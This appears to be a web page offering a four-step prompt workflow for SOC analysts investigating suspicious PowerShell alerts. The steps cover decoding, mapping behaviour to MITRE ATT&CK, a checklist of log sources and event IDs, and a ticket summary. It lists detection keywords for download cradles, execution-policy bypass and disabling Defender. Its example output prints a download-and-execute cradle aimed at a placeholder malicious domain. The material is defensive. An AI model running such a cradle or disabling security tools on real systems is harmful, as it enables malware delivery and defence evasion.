Suspicious PowerShell Investigation

Investigate suspicious PowerShell execution step-by-step. Decode obfuscated commands, identify attacker behavior, and generate a SOC-ready investigation summary.

⚡ Takes ~2–3 minutes 📊 Output: Summary + IOCs 🔒 No login required

No setup needed — just paste and run

  • Encoded PowerShell command detected
  • PowerShell spawning unusual processes
  • Suspicious script execution alert
1

Command Decoding

You are a SOC analyst investigating a suspicious PowerShell execution alert. Assume an enterprise environment unless I specify otherwise. Paste the raw PowerShell command or alert below. Analyze the following: 1. Is the command encoded? (Base64, hex, or other obfuscation) If yes, decode it and show the decoded output. If the command cannot be decoded confidently, say "Unable to decode with provided data." 2. Does the command download anything from the internet? (Invoke-WebRequest, IEX, DownloadString, curl, wget) 3. Does it attempt to bypass execution policy? (-ExecutionPolicy Bypass, -ep bypass) 4. Does it run in a hidden window? (-WindowStyle Hidden, -NonInteractive) 5. Does it disable security tools? (Set-MpPreference, DisableRealtimeMonitoring) Output format: COMMAND OVERVIEW - Encoded: Yes / No - Decoded Command: [show decoded version or N/A] - Obfuscation Techniques Detected: [list or None] SUSPICIOUS INDICATORS | Indicator | Evidence | Risk Level | Only analyze what is present in the data provided. Do not guess or assume values not in the alert. [PASTE POWERSHELL COMMAND OR ALERT HERE]
2

Behavior Analysis

Based on the PowerShell command from Step 1, analyze the intended behavior. First analyze the full command before producing findings. Determine: 1. What is this command trying to do in plain English? 2. Which of these attack techniques does it match? - Download and execute payload - Credential dumping - Lateral movement - Persistence mechanism - Reconnaissance - Defense evasion - Reverse shell / C2 communication For each matching technique: - Cite the specific part of the command that indicates it - Map to MITRE ATT&CK tactic and technique ID - Rate confidence: High / Medium / Low Then list the top 2 legitimate false positive scenarios that could produce this exact command. If no clear behavior can be determined, state: "Insufficient data to determine behavior."
3

Investigation Checklist

Generate a targeted investigation checklist for this PowerShell alert. For each item provide: - Exact log source to check - Specific event IDs or field values - What malicious looks like vs benign Also provide: - 3 SIEM queries to hunt for related activity. If the alert source tool is known, write queries for that tool. If unknown, provide generic search logic and clearly label placeholders like [field_name]. - Parent process to investigate - Child processes spawned by PowerShell to look for - Network connections initiated by this process ⚠️ Mark top 2 steps as HIGH PRIORITY Key event IDs to consider: - 4103 / 4104 — PowerShell script block logging - 4688 — Process creation - 7045 — New service installed Base everything on the actual alert data. Do not give generic SOC advice.
4

SOC Ticket Summary

Write a professional SOC ticket summary for this PowerShell investigation. Include: - What the alert detected (one sentence) - Whether it appears malicious, suspicious, or benign and why - The key evidence supporting that conclusion - Recommended next action and who owns it Length: 3-4 sentences maximum. Format: suitable for pasting directly into a SIEM ticket. Severity: Critical / High / Medium / Low / Informational Disposition: True Positive / False Positive / Needs Investigation MITRE ATT&CK MAPPING | Tactic | Technique ID | Technique Name | Confidence | IOCS | IOC Type | Value | Context | If no IOCs identified, state: "No IOCs identified."

Example Output

Here's what you can expect after completing this workflow:

COMMAND OVERVIEW ================ Encoded: Yes (Base64) Decoded Command: IEX (New-Object Net.WebClient).DownloadString('http://malicious-domain.com/payload.ps1') Obfuscation Techniques: Base64 encoding, download cradle SUSPICIOUS INDICATORS ====================== | Indicator | Evidence | Risk Level | | Encoded command | Base64 string detected | High | | Download cradle | DownloadString to external URL | Critical | | Remote execution | IEX executing downloaded content | Critical | BEHAVIOR ANALYSIS ================= This command downloads and immediately executes a remote PowerShell script from an external server. This is a classic malware dropper technique. MITRE ATT&CK: T1059.001 — PowerShell Confidence: High SOC TICKET ========== Severity: CRITICAL Disposition: True Positive Encoded PowerShell command detected downloading and executing a remote payload from malicious-domain.com. This matches T1059.001 and indicates active malware staging. Endpoint has been isolated pending forensic review.

Generate SOC Investigation Summary

Populate a ready-to-paste investigation report for your ticket or incident log.

Copied!